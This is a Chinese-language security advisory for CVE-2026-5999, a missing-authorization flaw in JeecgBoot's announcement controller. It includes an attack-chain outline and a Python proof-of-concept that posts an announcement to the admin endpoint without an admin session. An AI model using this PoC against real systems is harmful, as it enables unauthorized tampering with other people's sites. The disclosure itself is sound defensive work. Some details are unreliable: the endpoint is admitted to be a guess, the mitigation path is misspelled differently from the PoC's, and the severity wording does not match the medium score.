CVE-2026-5999 JeecgBoot不当授权漏洞

漏洞信息

漏洞编号

CVE-2026-5999

漏洞类型

权限绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JeecgBoot

漏洞概述

JeecgBoot框架3.9.1及之前版本存在严重的不当授权漏洞。该漏洞源于SysAnnouncementController组件未对特定功能实施严格的权限校验，导致低权限攻击者可远程绕过安全机制。攻击者利用此漏洞可执行未授权操作，进而影响系统机密性与完整性。鉴于漏洞利用代码已公开且攻击成本低，风险较高，对业务安全构成严重威胁，建议管理员尽快排查并修复，防止被恶意利用。

技术细节

该漏洞的根本原因在于JeecgBoot框架的SysAnnouncementController组件中，特定接口未正确配置或遗漏了必要的权限控制注解（如`@RequiresPermissions`或自定义权限注解）。在JeecgBoot的标准安全架构中，接口访问通常经过严格的权限校验流程，依赖Spring Security或Shiro进行拦截。然而，受影响的方法存在逻辑缺陷，导致安全拦截器失效或被绕过。攻击者利用这一缺陷，无需获取管理员账号，仅需通过低权限账户或匿名网络请求，向目标端点发送特制的HTTP数据包。由于后端未能识别请求者的非法权限，系统错误地处理了该请求，导致攻击者能够执行未授权的系统管理功能，例如修改公告或管理数据。这不仅违反了最小权限原则，还直接威胁到系统的机密性、完整性和可用性，使得攻击者能够远程操控受影响组件。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统为JeecgBoot，并确定其版本在3.9.1及以下。

STEP 2

漏洞探测

攻击者向SysAnnouncementController的相关接口发送特制的数据包，检测是否存在权限校验缺失。

STEP 3

权限绕过

利用权限校验缺陷，攻击者在未授权或低权限状态下成功调用后台管理接口。

STEP 4

执行攻击

执行未授权操作，如发布公告、篡改数据等，造成机密性、完整性或可用性影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vuln(target_url):
    """
    PoC for CVE-2026-5999 JeecgBoot Improper Authorization
    Attempts to access a restricted endpoint in SysAnnouncementController
    """
    session = requests.Session()
    # Target endpoint (example based on typical JeecgBoot structure)
    # Attackers might attempt to add or edit an announcement without admin rights
    endpoint = "/sys/annountCement/add" 
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/json"
    }
    
    # Malicious payload attempting to create an announcement
    payload = {
        "titile": "Security Test",
        "msgContent": "CVE-2026-5999 PoC Execution",
        "startTime": "2026-01-01",
        "endTime": "2026-12-31"
    }
    
    try:
        # Sending request without valid admin session cookie or token
        # In a real scenario, the attacker might use a low-priv token
        response = session.post(target_url + endpoint, json=payload, headers=headers, verify=False, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Detected! Status: {response.status_code}")
            print(f"[+] Response: {response.text[:100]}")
        else:
            print(f"[-] Status: {response.status_code}")
            
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    url = "http://127.0.0.1:8080/jeecg-boot"
    check_vuln(url)

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施

在未升级版本前，建议通过WAF或Nginx等反向代理限制对/sys/annountCouncement/*等敏感路径的访问来源，仅允许内网或受信任IP访问，并暂时关闭非必要的公告管理功能，以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5999
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5999
3 Details https://www.cvedetails.com/cve/CVE-2026-5999/
4 VulDB https://vuldb.com/cve/CVE-2026-5999
5 Link https://github.com/jeecgboot/JeecgBoot/
6 Link https://github.com/jeecgboot/JeecgBoot/issues/9508
7 Link https://github.com/jeecgboot/JeecgBoot/issues/9508#issuecomment-4199090102
8 Link https://vuldb.com/submit/793656
9 Link https://vuldb.com/vuln/356553
10 Link https://vuldb.com/vuln/356553/cti